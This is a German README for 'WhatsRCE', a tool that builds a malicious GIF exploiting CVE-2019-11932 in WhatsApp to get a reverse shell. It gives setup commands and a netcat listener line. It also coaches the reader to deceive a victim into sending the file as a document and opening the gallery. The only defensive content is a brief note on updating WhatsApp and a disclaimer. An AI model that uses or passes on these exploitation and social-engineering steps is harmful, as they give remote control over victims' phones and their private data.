WhatsRCE
Dies ist ein automatisch generierter Payload für CVE-2019-11932 (WhatsApp Remote Code Execution)
- Automatische Installation von GCC (harmloser Befehl, du kannst sehen, dass dies Open-Source ist)
- Speichern als .GIF-Datei
Wie benutzt man?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
Wie erhält man eine Shell?
- Du sendest die .GIF-Datei einfach an das Opfer ALS DOKUMENT, NICHT ALS BILD
- Und setzt nc / netcat auf den Port, den du bei den WhatsRCE-Tools festgelegt hast {nc -lnvp dein_port}
- Du kannst den Social-Engineering-Angriff nutzen, damit Opfer dazu verleitet werden, diesen Exploit auszulösen
- Sage dem Opfer, es soll die Galerie über WhatsApp öffnen, und schicke dem Opfer die Anweisung, beliebige Fotos zu senden (nicht nötig, es reicht, in die Galerie zu gehen, kein Problem). Danach erhältst du einige Sekunden später eine Shell-Verbindung vom Opfer
oder schau dir einfach das an
DEMO-VIDEO
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
falls der obige Link nicht zugänglich ist
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
Wie vermeidet man diesen Angriff?
- Aktualisiere dein WhatsApp auf die neueste Version (Gefixt in Version 2.19.244)
- Wie man Dateien, einschließlich Audio, Bilder und andere, von Personen empfängt, die wir nicht kennen
Dies dient nur zu Lernzwecken; für Konsequenzen usw., falls du es für eine Straftat nutzt, übernehme ich keine Verantwortung!